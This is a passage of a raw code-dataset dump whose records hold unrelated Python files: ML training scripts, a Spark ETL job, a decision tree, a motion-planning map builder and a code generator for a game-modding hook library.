print(line)\n","sub_path":"WorkData2.0/tools/parsing/to_conllu/compose_deprel.py","file_name":"compose_deprel.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"514743121","text":"# -*- coding: UTF-8 -*-\n# @Time : 2018/12/21 2:20 PM\n# @File : hyperparameters_factory.py\n# @Author : jian\nfrom __future__ import division\nfrom __future__ import unicode_literals\nfrom __future__ import print_function\nfrom antgo.automl.suggestion.algorithm.grid_search import *\n\n\nclass HyperparametersFactory(object):\n @staticmethod\n def get(name):\n if name not in ['GridSearch']:\n return None\n\n if name == 'GridSearch':\n return GridSearchAlgorithm\n\n @staticmethod\n def all():\n return ['GridSearch']","sub_path":"antgo/automl/suggestion/algorithm/hyperparameters_factory.py","file_name":"hyperparameters_factory.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"225410106","text":"import configparser\nfrom datetime import datetime\nimport os\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import udf, col\nfrom pyspark.sql.functions import year, month, dayofmonth, hour, weekofyear, date_format\n\n\nconfig = configparser.ConfigParser()\nconfig.read('dl.cfg')\n\nos.environ['AWS_ACCESS_KEY_ID']=config.get('AWS', 'AWS_ACCESS_KEY_ID')\nos.environ['AWS_SECRET_ACCESS_KEY']=config.get('AWS', 'AWS_SECRET_ACCESS_KEY')\n\n\ndef create_spark_session():\n ''' Create a Spark Session and return the spark session object'''\n \n spark = SparkSession \\\n .builder \\\n .config(\"spark.jars.packages\", \"org.apache.hadoop:hadoop-aws:2.7.0\") \\\n .getOrCreate()\n return spark\n\n\ndef process_song_data(spark, input_data, output_data):\n # get filepath to song data file\n song_data = input_data+'song_data/A/A/B/*.json'\n print('read song_data json files')\n \n # read song data file\n df = spark.read.json(song_data)\n\n # extract columns to create songs table\n songs_table = df.select(['song_id', 'title', 'artist_id', 'duration', 'year']).dropDuplicates()\n print('exrtacted data for songs_table')\n \n # write songs table to parquet files partitioned by year and artist\n #songs_table = songs_table.write().partitionBy(['year', 'artist_id']).format(\"parquet\").save(os.path.join(output_data, \"songs.parquet\"))\n print('saved songs_table')\n\n # extract columns to create artists table\n artists_table = df.select(['artist_id', 'artist_name', 'artist_location', 'artist_lattitude', 'artist_longitude']).dropDuplicates()\n \n # write artists table to parquet files\n #artists_table = artists_table.write().format(\"parquet\").save(os.path.join(output_data, \"artist.parquet\"))\n\n\n# def process_log_data(spark, input_data, output_data):\n# # get filepath to log data file\n# log_data = input_data+'log_data/2018/11/*.json'\n\n# # read log data file\n# df = spark.read.json(log_data)\n \n# # filter by actions for song plays\n# df = \n\n# # extract columns for users table \n# artists_table = \n \n# # write users table to parquet files\n# artists_table\n\n# # create timestamp column from original timestamp column\n# get_timestamp = udf()\n# df = \n \n# # create datetime column from original timestamp column\n# get_datetime = udf()\n# df = \n \n# # extract columns to create time table\n# time_table = \n \n# # write time table to parquet files partitioned by year and month\n# time_table\n\n# # read in song data to use for songplays table\n# song_df = \n\n# # extract columns from joined song and log datasets to create songplays table \n# songplays_table = \n\n# # write songplays table to parquet files partitioned by year and month\n# songplays_table\n\n\ndef main():\n spark = create_spark_session()\n input_data = \"s3a://udacity-dend/\"\n #output_data = \"s3a://praveen-practice-bucket/\"\n output_data = \"s3a://udacity-dend/\"\n \n process_song_data(spark, input_data, output_data) \n #process_log_data(spark, input_data, output_data)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"4 Data Lakes with Spark/etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"388112686","text":"\ndef checkInclusion(s1, s2):\n \"\"\"\n :type s1: str\n :type s2: str\n :rtype: bool\n \"\"\"\n c1 = []\n c2 = []\n for ch in s1:\n c1[ord(ch) - ord('a')] += 1\n for ch in s2:\n c2[ord(ch) - ord('a')] += 1\n\n if c1 == c2:\n return True\n\n\n\n\n\n\ncheckInclusion('ab', 'aaabaoo')","sub_path":"python_sward/Dance.py","file_name":"Dance.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"1022870","text":"import tensorflow as tf\nimport Image\nimport numpy as np\nimport numpy.random as npr\nimport scipy.misc as spm\nfrom next_batch import *\n\ndef weight_variable(shape,stringg):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial,name=stringg)\n\ndef bias_variable(shape, stringg):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial, name=stringg)\n\ndef conv2d(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME') #it keeps the format of the image\n\ndef max_pool_2x2(x, stringg):\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],\n strides=[1, 2, 2, 1], padding='SAME', name=stringg) #it keeps the format of the image\n\n\n#defining the graph\n\nx = tf.placeholder(tf.float32, name=\"x\")\ny_ = tf.placeholder(tf.float32, name=\"y_\")\n\n#reshape the input data\nx_image = tf.reshape(x, [-1,224,224,3], name=\"x_image\")\n\n#create variables\nW_conv1 = weight_variable([5,5,3,32], \"W_conv1\")\nb_conv1 = bias_variable([32], \"b_conv1\")\n\n#apply a convolution and after that the relu\nh_conv1 = tf.nn.relu(conv2d(x_image,W_conv1)+b_conv1, name=\"h_conv1\")\n\n#now the max pooling op\nh_pool1 = max_pool_2x2(h_conv1,\"h_pool1\")\n\n#add a second convolutional layer\nW_conv2 = weight_variable([6,6,32,32], 'W_conv2')\nb_conv2 = weight_variable([32], 'b')\n\n#apply a convolution and after that the relu\nh_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2)+b_conv2, name='h_conv2')\n\n#now the max pooling op\nh_pool2 = max_pool_2x2(h_conv2, 'h_pool2')\n\n#and now we want to create a fully connected layer\nh_pool2_size = np.array(h_pool2.get_shape().as_list()[1:4])\nreduced = reduce(lambda x, y: x*y, h_pool2_size)\n\nWfc_1 = weight_variable([reduced, 1024], \"Wfc_1\")\nbfc_1 = bias_variable([1024], \"bfc_1\")\n\n#flattening the pooled image\nh_pool2_flat = tf.reshape(h_pool2, [-1,reduced])\n\n#and now we can multiply the weight and sum the bias\nhfc_1 = tf.add(tf.matmul(h_pool2_flat, Wfc_1), bfc_1)\nhfc_1 = tf.nn.relu(hfc_1, name=\"hfc_1\")\n\nWfc_2 = weight_variable([1024,2], \"Wfc_2\")\nbfc_2 = bias_variable([2], \"bfc_2\")\n\ny_hat = tf.add(tf.matmul(hfc_1,Wfc_2),bfc_2,name=\"y_hat\")\n\n#let's define the loss function, optimizer and accuracy\n\ncross_entropy = tf.reduce_mean(\n tf.nn.softmax_cross_entropy_with_logits(\n labels=y_, logits=y_hat), name=\"cross_entropy\")\n\nlr = tf.placeholder(tf.float32, name=\"lr\")\n\noptimizer = tf.train.AdamOptimizer(1e-6)\ntrain_step = optimizer.minimize(cross_entropy)\ntf.add_to_collection('train_step', train_step)\n\n#for counting the correct predictions\ncorrect_prediction = tf.equal(tf.argmax(y_hat,1), tf.argmax(y_,1), name=\"correct_prediction\")\n\n#and for the accuracy\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32), name=\"accuracy\")\n\n#defining our parameters\nepochs = 100\nbatch_size = 55\npath = \"sample\"\ndisplay_step = 3\n\n#define the saver\nsaver = tf.train.Saver()\n\n#initializing the variables\ninit_op = tf.global_variables_initializer()\nsess = tf.Session()\nsess.run(init_op)\n\n#load the number of images which will be\n#used for training\nvector_training = np.load(\"vectors/vector_training.npy\")\n\n#Let's train!\n\nvectortrain = npr.choice(vector_training, vector_training.size, replace=False)\nfor epoch in range(epochs):\n counter = 0\n for i in range(0,vectortrain.size,batch_size):\n batch = next_batch(vectortrain[i:(i+batch_size)],path,3)\n if counter%display_step == 0:\n train_accuracy = accuracy.eval(session=sess,feed_dict={\n x:batch[0], y_: batch[1]})\n print(\"step %d, training accuracy %g, epoch%d\"%(counter, train_accuracy, epoch))\n train_loss = cross_entropy.eval(session=sess,feed_dict={\n x:batch[0], y_: batch[1]})\n print(\"step %d, training loss %g, epoch %d\"%(counter, train_loss, epoch))\n train_step.run(session=sess, feed_dict={x: batch[0], y_: batch[1]})\n counter += 1\n #save after every epoch\n if epoch%10 == 0:\n saver.save(sess, \"cnn2/my_model\")\n\nprint(\"Optimization finished\")\n\nvector_test = np.load(\"vectors/vector_test.npy\")\n\nxtest, ytest = next_batch(vector_test,path,3)\nprint(\"test accuracy %g\"%accuracy.eval(session=sess,feed_dict={\n x: xtest, y_: ytest}))\n\n#test accuracy 65,3846%\n","sub_path":"Projeto/code/models/cnn2.py","file_name":"cnn2.py","file_ext":"py","file_size_in_byte":4218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"401156248","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 26 09:44:08 2021\n\n@author: spunlag\n\"\"\"\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Ellipse, Rectangle\n\nplt.figure()\nplt.axes()\nax = plt.gca()\n\nellipse = Ellipse(xy=(0.5, 0.4), width=1, height=0.8, \n edgecolor='r', fc='r', lw=2)\n\nrect = Rectangle((0, 0), 1, 0.8, linewidth=1, edgecolor='k', facecolor='None')\nax.add_patch(ellipse)\nax.add_patch(rect)\nax.plot(0.5,0.4, 'ko')\nplt.text(0.3,0.43,r'($\\ell_1 +\\bar{r_1}$,$\\ell_2 + \\bar{r_2}$ )=(0.5,0.4)') \nax.plot(1,0.4,'ko')\nplt.text(0.67, 0.35, r'($\\ell_1$,$\\ell_2 + \\bar{r_2}$) = (1,0.4)')\nax.plot(0.5, 0.8, 'ko')\nplt.text(0.35, 0.73, r'($\\ell_1 +\\bar{r_1}$,$\\ell_2$ )=(0.5,0.8)')\n","sub_path":"Shortest Path/ellipse.py","file_name":"ellipse.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"258846645","text":"from math import log\n\n\ndef create_dataset():\n dataset = [[0, 0, 0, 0, 'no'],\n [0, 0, 0, 1, 'no'],\n [0, 1, 0, 1, 'yes'],\n [0, 1, 1, 0, 'yes'],\n [0, 0, 0, 0, 'no'],\n [1, 0, 0, 0, 'no'],\n [1, 0, 0, 1, 'no'],\n [1, 1, 1, 1, 'yes'],\n [1, 0, 1, 2, 'yes'],\n [1, 0, 1, 2, 'yes'],\n [2, 0, 1, 2, 'yes'],\n [2, 0, 1, 1, 'yes'],\n [2, 1, 0, 1, 'yes'],\n [2, 1, 0, 2, 'yes'],\n [2, 0, 0, 0, 'no']]\n features = ['年龄', '有工作', '有自己的房子', '信贷情况']\n # 年龄:青年0,中年1,老年2\n # 有工作:是1,否0\n # 有自己的房子:是1,否0\n # 信贷情况:一般0,好1,非常好2\n return dataset, features\n\n\ndef calc_entropy(data):\n samples = len(data) # 对于监督学习对应的数据集,每一行数据为一个样本,每个样本包含一个特征向量和一个标记\n labels_count = {} # 构建字典{标记:出现次数}保存每个标记出现的次数\n\n for sample in data: # 对每一个样本进行统计\n label = sample[-1] # 每个样本的最后一列为标记\n if label not in labels_count.keys(): # 如果标记未放入统计次数的字典,添加进去\n labels_count[label] = 0\n labels_count[label] += 1 # 每个标记的样本数\n # print(labels_count)\n\n entropy = 0.0 # 经验熵(香农熵)\n for key in labels_count: # 计算香农熵\n prob = float(labels_count[key]) / samples # 标记对应次数/总的样本数\n entropy -= prob * log(prob, 2) # 利用公式计算\n return entropy\n\n\ndef split_dataset(data, axis, value):\n sub_data = []\n # 创建返回的数据集列表\n for feat_vec in data: # 遍历数据集\n if feat_vec[axis] == value:\n select_feat_vec = feat_vec[:axis] # 去掉axis特征\n select_feat_vec.append(feat_vec[axis]) # 将符合条件的添加到返回的数据集\n select_feat_vec.extend([feat_vec[len(data[0])-1]])\n sub_data.append(select_feat_vec)\n return sub_data\n\n\ndef calc_cond_entropy(data, axis):\n cond_entropy = 0\n feat_list = [sample[axis] for sample in data] # 取出某一列特征对应所有取值\n feat_value = list(set(feat_list))\n for value in feat_value:\n sub_data = split_dataset(data, axis, value)\n prob = len(sub_data)/float(len(data))\n cond_entropy += prob * calc_entropy(sub_data)\n return cond_entropy\n\n\ndef calc_info_gain(data, axis):\n # 信息增益 = 信息熵 - 条件熵\n info_gain = calc_entropy(data) - calc_cond_entropy(data, axis)\n return info_gain\n\n\ndef ID3_Algorithm(data):\n best_info_gain = 0.0\n best_feature = -1\n num_features = len(data[0]) - 1\n for i in range(num_features):\n info_gain = calc_info_gain(data, i)\n print(\"第%d个特征的增益为%.3f\" % (i, info_gain))\n if info_gain > best_info_gain:\n best_info_gain = info_gain\n best_feature = i\n return best_feature\n\n\ndef C4_5_Algorithm(data):\n return 0\n\n\nif __name__ == '__main__':\n d, f = create_dataset()\n print(\"最优特征为:%s\" % f[ID3_Algorithm(d)])\n","sub_path":"ClassicalAlgorithm/DecisionTree/DecisionTree_ByYourself.py","file_name":"DecisionTree_ByYourself.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"466294841","text":"_base_ = [\n '../../_base_/models/deep_yolo_base.py',\n '../../_base_/datasets/antiuav_rgb_ncc.py',\n '../../_base_/drone_runtime.py'\n]\nmodel = dict(\n type='DeepSORT',\n pretrains=dict(\n detector= # noqa: E251\n \"/home2/lgfm95/drone/Strig-UAV-Project/anti-uav/YOLOv3/rgb/latest.pth\",\n reid= # noqa: E251\n 'https://download.openmmlab.com/mmtracking/mot/reid/tracktor_reid_r50_iter25245-a452f51f.pth' # noqa: E501\n ))\nimg_norm_cfg = dict(mean=[0, 0, 0], std=[255., 255., 255.], to_rgb=True)\ntrain_pipeline = [\n dict(type='LoadImageFromFile', to_float32=True),\n dict(type='LoadAnnotations', with_bbox=True),\n dict(type='PhotoMetricDistortion'),\n dict(\n type='Expand',\n mean=img_norm_cfg['mean'],\n to_rgb=img_norm_cfg['to_rgb'],\n ratio_range=(1, 2)),\n dict(\n type='MinIoURandomCrop',\n min_ious=(0.4, 0.5, 0.6, 0.7, 0.8, 0.9),\n min_crop_size=0.3),\n dict(type='Resize', img_scale=[(320, 320), (608, 608)], keep_ratio=True),\n dict(type='RandomFlip', flip_ratio=0.5),\n dict(type='Normalize', **img_norm_cfg),\n dict(type='Pad', size_divisor=32),\n dict(type='DefaultFormatBundle'),\n dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels'])\n]\ntest_pipeline = [\n dict(type='LoadImageFromFile'),\n dict(\n type='MultiScaleFlipAug',\n img_scale=(608, 608),\n flip=False,\n transforms=[\n dict(type='Resize', keep_ratio=True),\n dict(type='RandomFlip'),\n dict(type='Normalize', **img_norm_cfg),\n dict(type='Pad', size_divisor=32),\n dict(type='ImageToTensor', keys=['img']),\n dict(type='VideoCollect', keys=['img'])\n ])\n]\ndata = dict(\n train=dict(pipeline=train_pipeline),\n test=dict(pipeline=test_pipeline)\n)","sub_path":"tracking/configs/mot/deepsort/deepsort_yolo_antiuav_rgb.py","file_name":"deepsort_yolo_antiuav_rgb.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"133814682","text":"#!/usr/bin/env python\n\nimport numpy as np # I update the numpy to 1.15.1 using sudo pip install --upgrade numpy\nimport cv2\nfrom scipy.spatial import ConvexHull, convex_hull_plot_2d\nfrom marker import myMarker\n\n#read return obstacle objects from file\ndef load_obstacles(object_path):\n obstacles = []\n obstacle = []\n with open(object_path) as f:\n numObstacles = int(f.readline())\n coordinates = int(f.readline())\n for i in range(coordinates):\n line = f.readline()\n obstacle.append(list(map(int, line.strip().split(' '))))\n for line in f:\n coordinates = list(map(int, line.strip().split(' ')))\n if len(coordinates) == 1:\n obstacles.append(obstacle)\n obstacle = []\n else:\n obstacle.append(coordinates)\n obstacles.append(obstacle)\n assert len(obstacles)==numObstacles, \"number of obstacles does not match the first line\"\n \n return obstacles\n\n#return goal from file\ndef load_goal(goal_path):\n with open(goal_path) as f:\n line = f.readline()\n goal = list(map(int, line.strip().split(' ')))\n return goal\n\n\n#make an expanded set of points with margin w\ndef extraPointsMod(obsticle):\n newObsticle = []\n for point in obsticle:\n x = point[0] #---------x \n y = point[1] #---------y\n w = 18 #---------robot val assuming it's in the middle (width 36)\n #all points with a sqaure at every corner of orgininal vertex \n newObsticle.append([x-w, y+w])\n newObsticle.append([x-w, y])\n newObsticle.append([x-w, y-w])\n \n newObsticle.append([x, y+w])\n newObsticle.append([x,y])\n newObsticle.append([x, y-w])\n \n newObsticle.append([x+w, y+w])\n newObsticle.append([x+w, y])\n newObsticle.append([x+w, y-w])\n\n return newObsticle\n\n#make all non-colliding lines between the vertices of the hulls\ndef createLines(obsHulls, obsEdges):\n\n n = len(obsHulls)\n lines = []\n for i in range(n):\n hull1 = obsHulls[i]\n for a in hull1:\n for j in range(i+1,n):\n hull2 = obsHulls[j]\n for b in hull2:\n elem = [a,b]\n if not isCollision(a,b,obsEdges) :\n lines.append(elem)\n return lines\n\n\n#check if line [p1,p2] collides with objects defined by obsEdges\ndef isCollision(p1,p2, obsEdges):\n for edge in obsEdges:\n q1 = edge[0]\n q2 = edge[1]\n #checks if two lines intersect ie collision \n if isIntersect(p1, p2, q1, q2):\n return True\n \n #print(\"no collision detected\")\n return False\n\n#check whether two lines intersect\ndef isIntersect(p1, p2, q1, q2):\n #conditions for intersection\n\n o1 = orientation(p1, p2, q1)\n o2 = orientation(p1, p2, q2)\n o3 = orientation(q1, q2, p1)\n o4 = orientation(q1, q2, p2)\n\n if (equalVerts(p1, q1) or equalVerts(p1, q2) or equalVerts(p2, q1) or equalVerts(p2, q2)):\n return False\n if (o1 != o2 and o3 != o4):\n return True\n return False\n\n#utility fn\ndef equalVerts(v1, v2):\n return (v1[0] == v2[0] and v1[1] == v2[1])\n\n\n#https://stackoverflow.com/questions/17592800/how-to-find-the-orientation-of-three-points-in-a-two-dimensional-space-given-coo\ndef orientation(p, q, r):\n # find orientation of ordered triplet (p, q, r)\n #---0 --> p, q and r are colinear \n #---1 --> Clockwise \n #---2 --> Counterclockwise \n val = (q[1] - p[1]) * (r[0] - q[0]) - (q[0] - p[0]) * (r[1] - q[1]) \n \n #return val\n if val == 0:\n return 0\n elif val > 0:\n return 1\n return 2\n\n#given an ordered list of some object's vertices, returns its edges\ndef getEdges(obsVerts):\n n = len(obsVerts)\n lines = []\n \n for i in range(n-1):\n a = obsVerts[i]\n b = obsVerts[i+1]\n elem = [a,b]\n lines.append(elem)\n\n lastLine = [obsVerts[0], obsVerts[n-1]]\n lines.append(lastLine)\n return lines\n","sub_path":"src/create_map.py","file_name":"create_map.py","file_ext":"py","file_size_in_byte":4296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"505377257","text":"#!/usr/bin/python3\nimport datetime\nimport os\nimport argparse\nimport json\nimport re\n#from itanium_demangler import parse as demangle\n\nparser = argparse.ArgumentParser(description='Processes headers')\nparser.add_argument('-a', '--arch', type=str, help='arch', choices=['x86', 'x64'], required=True)\nparser.add_argument('-p', '--platform', type=str, help='platform', choices=['windows'], required=True)\nparser.add_argument('input', metavar='file', type=str, nargs='+', help='input json symbol maps')\nargs = parser.parse_args()\nout_file_cpp = open(\"main.cpp\", \"w\")\nout_file_header = open(\"main.h\", \"w\")\nout_file_asm = open(\"init.asm\", \"w\")\narch = args.arch\nplatform = args.platform\nin_files = args.input\n\nsymbol_list = []\nsymbol_list_versioned = []\nvtable_list = []\nvtable_output = []\nvar_list = []\nvar_list_versioned = []\ninclude_list = []\ncxx_output = \"\"\nasm_output = \"\"\n\ndef output_cpp(text):\n text += \"\\n\"\n global cxx_output\n cxx_output += \"CXX: \" + text\n if out_file_cpp is not None:\n out_file_cpp.write(text)\n\ndef output_header_cpp(text):\n text += \"\\n\"\n global cxx_output\n cxx_output += \"CXX: \" + text\n if out_file_header is not None:\n out_file_header.write(text)\n\ndef output_asm(text):\n text += \"\\n\"\n global asm_output\n asm_output += \"ASM: \" + text\n if out_file_asm is not None:\n out_file_asm.write(text)\n\ndef read_json(file):\n reader = json.load(file)\n for key in reader:\n if key == \"vtable\":\n for obj in reader[key]:\n vtable_list.append({\"name\": obj[\"name\"], \"parent\": obj.get(\"parent\", \"\"), \"address\": obj.get(\"address\", \"\"), \"functions\": obj.get(\"functions\", []), \"overload\": obj.get(\"overload\", \"null\")})\n if key == \"functions\":\n for obj in reader[key]:\n symbol_list.append({\"mangled_name\": obj[\"name\"], \"address\": obj[\"address\"], \"signature\": obj.get(\"signature\", \"\"), \"overload\": obj.get(\"overload\", \"null\")})\n if type(obj[\"address\"]) == dict:\n symbol_list_versioned.append({\"mangled_name\": obj[\"name\"], \"address\": obj[\"address\"], \"signature\": obj.get(\"signature\", \"\"), \"overload\": obj.get(\"overload\", \"null\")})\n if key == \"variables\":\n for variable_keys in reader[key].keys():\n var_list.append({\"name\": variable_keys, \"address\": reader[key][variable_keys]})\n if type(reader[key][variable_keys] == dict):\n var_list_versioned.append({\"name\": variable_keys, \"address\": reader[key][variable_keys]}) \n if key == \"includes\":\n for strs in reader[key]:\n include_list.append(strs)\n\n\ndef generate_windows_cpp():\n output_cpp(\"\")\n output_cpp(\"#include \")\n output_cpp(\"\")\n output_cpp(\"BOOL APIENTRY DllMain(HMODULE hModule, DWORD fdwReason, LPVOID lpReserved) {\")\n output_cpp(\"\\tif(fdwReason == DLL_PROCESS_ATTACH) InitBedrockPointers();\")\n output_cpp(\"\\treturn TRUE;\")\n output_cpp(\"}\")\n\ndef mangled_name_to_variable(str):\n str = str.replace(\"?\", '_')\n str = str.replace(\"@\", '_')\n return str\n\ndef generate_init_cpp():\n output_header_cpp(\"\")\n output_header_cpp(\"#pragma once\")\n output_header_cpp(\"\")\n output_header_cpp(\"#include \")\n if len(symbol_list) > 0 or len(vtable_list) > 0:\n output_header_cpp(\"\")\n output_header_cpp(\"extern \\\"C\\\" {\")\n for a in symbol_list:\n output_header_cpp(\"\\textern void* \" + mangled_name_to_variable(a[\"mangled_name\"]) + \"_ptr;\")\n for a in vtable_list:\n output_header_cpp(\"\\textern void* \" + a[\"name\"] + \"_vtable;\")\n output_header_cpp(\"}\")\n output_header_cpp(\"\")\n output_header_cpp(\"void InitBedrockPointers();\")\n if len(symbol_list_versioned) > 0:\n output_header_cpp(\"void InitVersionPointers(std::string);\")\n output_cpp(\"\")\n output_cpp(\"#include \\\"main.h\\\"\")\n for a in include_list:\n output_cpp(a)\n output_cpp(\"\")\n for a in var_list:\n address = a[\"address\"]\n if address and type(address) == str:\n address = \" = reinterpret_cast<\" + a[\"name\"][:a[\"name\"].rfind(\"*\")+1] + \">(Zenova::Hook::SlideAddress(\" + address + \"))\"\n else:\n address = \"\"\n output_cpp(a[\"name\"] + address + \";\")\n output_cpp(\"\")\n output_cpp(\"extern \\\"C\\\" {\")\n for a in symbol_list:\n output_cpp(\"\\tvoid* \" + mangled_name_to_variable(a[\"mangled_name\"]) + \"_ptr;\")\n for a in vtable_list:\n output_cpp(\"\\tvoid* \" + a[\"name\"] + \"_vtable;\")\n output_cpp(\"}\")\n output_cpp(\"\")\n if len(symbol_list_versioned) > 0:\n output_cpp(\"static std::unordered_map pointerList[\" + str(len(symbol_list_versioned) + len(var_list_versioned)) + \"];\")\n output_cpp(\"\")\n if len(symbol_list) > 0 or len(vtable_list) > 0 or len(var_list) > 0:\n output_cpp(\"void InitBedrockPointers() {\")\n for a in var_list:\n if a[\"address\"] == \"\":\n loc = a[\"name\"].rfind(\"*\") + 1\n while a[\"name\"][loc] == \" \":\n loc += 1\n output_cpp(\"\\t\" + a[\"name\"][loc:] + \" = reinterpret_cast<\" + a[\"name\"][:-a[\"name\"].rfind(\"*\")] + \">(Zenova::Hook::FindVariable(\\\"\" + a[\"name\"] + \"\\\"));\")\n pointer_index = 0\n for a in symbol_list:\n if type(a[\"address\"]) == dict:\n for version, address in a[\"address\"].items():\n output_cpp(\"\\tpointerList[\" + str(pointer_index) + \"][\\\"\" + str(version) + \"\\\"] = \" + str(address) + \";\")\n pointer_index += 1\n elif type(a[\"address\"]) == str:\n name_legal = mangled_name_to_variable(a[\"mangled_name\"])\n if a[\"address\"] != \"\":\n output_cpp(\"\\t\" + name_legal + \"_ptr = reinterpret_cast(Zenova::Hook::SlideAddress(\" + a[\"address\"] + \"));\")\n if a[\"overload\"] == \"always\" or (a[\"overload\"] == \"null\" and a[\"address\"] == \"\"):\n output_cpp(\"\\t\" + name_legal + \"_ptr = reinterpret_cast(Zenova::Hook::FindSymbol(\\\"\" + a[\"mangled_name\"] + \"\\\"));\")\n for a in vtable_list:\n if a[\"address\"] != \"\":\n output_cpp(\"\\t\" + a[\"name\"] + \"_vtable = reinterpret_cast(Zenova::Hook::SlideAddress(\" + a[\"address\"] + \"));\")\n if a[\"overload\"] == \"always\" or (a[\"overload\"] == \"null\" and a[\"address\"] == \"\"):\n output_cpp(\"\\t\" + name_legal + \"_ptr = reinterpret_cast(Zenova::Hook::FindVtable(\\\"\" + a[\"mangled_name\"] + \"\\\"));\")\n for var in var_list_versioned:\n for version, address in var[\"address\"].items():\n output_cpp(\"\\tpointerList[\" + str(pointer_index) + \"][\\\"\" + str(version) + \"\\\"] = \" + str(address) + \";\")\n pointer_index += 1\n output_cpp(\"}\")\n if len(symbol_list_versioned) > 0 or len(var_list_versioned) > 0:\n output_cpp(\"\")\n output_cpp(\"void InitVersionPointers(std::string versionId) {\")\n pointer_index = 0\n for a in symbol_list_versioned:\n name_legal = mangled_name_to_variable(a[\"mangled_name\"])\n output_cpp(\"\\t\" + name_legal + \"_ptr = reinterpret_cast(Zenova::Hook::SlideAddress(pointerList[\" + str(pointer_index) + \"][versionId]));\")\n pointer_index += 1\n for var in var_list_versioned:\n address = \" = reinterpret_cast<\" + var[\"name\"][:var[\"name\"].rfind(\"*\")+1] + \">(Zenova::Hook::SlideAddress(pointerList[\" + str(pointer_index) + \"][versionId]))\"\n output_cpp(\"\\t\" + var[\"name\"][var[\"name\"].rfind(\"*\")+1:].strip() + address + \";\")\n pointer_index += 1\n output_cpp(\"}\")\n\n\n\ndef process_vtable(vtable):\n vtable_out = next((x for x in vtable_output if vtable[\"name\"] == x[\"name\"]), {})\n if not vtable_out:\n vtable_out[\"name\"] = vtable[\"name\"]\n vtable_out[\"functions_out\"] = []\n vtable_out[\"functions_in\"] = []\n vtable_out[\"parents\"] = []\n i = 0\n vtable_parent_str = vtable[\"parent\"]\n vtable_parent_out = {}\n if vtable_parent_str:\n vtable_parent = next((x for x in vtable_list if x[\"name\"] == vtable_parent_str), {})\n if vtable_parent:\n vtable_parent_out = process_vtable(vtable_parent)\n vtable_out[\"parents\"].append(vtable_parent_out)\n vtable_out[\"parents\"].extend(vtable_parent_out[\"parents\"])\n for a in vtable[\"functions\"]:\n func_name_base = a.replace(vtable[\"name\"] + \"@@\", \"@@\", 1)\n if len(vtable_out[\"parents\"]) > 0:\n for parent in vtable_out[\"parents\"]:\n func_name_base = re.sub('(@@@.*)' + parent[\"name\"] + '@@', r'\\g<1>1@', func_name_base)\n for b in vtable_parent_out[\"functions_in\"][i:]:\n if func_name_base == b[0]:\n break\n vtable_out[\"functions_in\"].append([b[0], i])\n i += 1\n vtable_out[\"functions_in\"].append([func_name_base, i])\n if a:\n vtable_out[\"functions_out\"].append([a, i])\n i += 1\n vtable_output.append(vtable_out)\n return vtable_out\n \n \n\n#NASM, MASM doesn't allow long identifiers\ndef generate_init_func_x86(size):\n if size == 64:\n reg = \"rax\"\n pointer_size = 8\n output_asm(\"bits 64\")\n if size == 32:\n reg = \"eax\"\n pointer_size = 4\n\n output_asm(\"SECTION .data\")\n for a in symbol_list:\n output_asm(\"extern \" + mangled_name_to_variable(a[\"mangled_name\"]) + \"_ptr\")\n for a in vtable_list:\n output_asm(\"extern \" + a[\"name\"] + \"_vtable\")\n output_asm(\"\")\n output_asm(\"SECTION .text\")\n for a in symbol_list:\n output_asm(\"global \" + a[\"mangled_name\"])\n output_asm(a[\"mangled_name\"] + \":\")\n output_asm(\"\\tmov rax, [rel \" + mangled_name_to_variable(a[\"mangled_name\"]) + \"_ptr\" + \"]\")\n output_asm(\"\\tjmp rax\")\n for vtable in vtable_list:\n vtable_out = process_vtable(vtable)\n print(vtable_out[\"name\"] + \"\\n\")\n for a in vtable_out[\"functions_out\"]:\n output_asm(\"global \" + a[0])\n output_asm(a[0] + \":\")\n output_asm(\"\\tmov \" + reg + \", [rel \" + vtable_out[\"name\"] + \"_vtable]\")\n output_asm(\"\\tjmp [\" + reg + \"+\" + str(a[1] * pointer_size) + \"]\")\n\ndef generate_init_func_arm():\n i = 0\n for a in symbol_list:\n output_asm(\".globl \" + a[\"mangled_name\"] + \"\")\n output_asm(\".type \" + a[\"mangled_name\"] + \", %function\")\n output_asm(a[\"mangled_name\"] + \":\")\n output_asm(f\"\\tldr r12, .L{i}$ptr\")\n output_asm(f\".L{i}$pldr:\")\n output_asm(f\"\\tldr r12, [pc, r12]\")\n output_asm(f\"\\tldr r12, [r12]\")\n output_asm(f\"\\tbx\t r12\")\n output_asm(f\".L{i}$ptr:\")\n output_asm(f\"\\t.long {a['mangled_name']}_ptr(GOT_PREL)-((.L{i}$pldr+8)-.L{i}$ptr)\")\n output_asm(\"\\t.size \" + a[\"mangled_name\"] + \", .-\" + a[\"mangled_name\"])\n i += 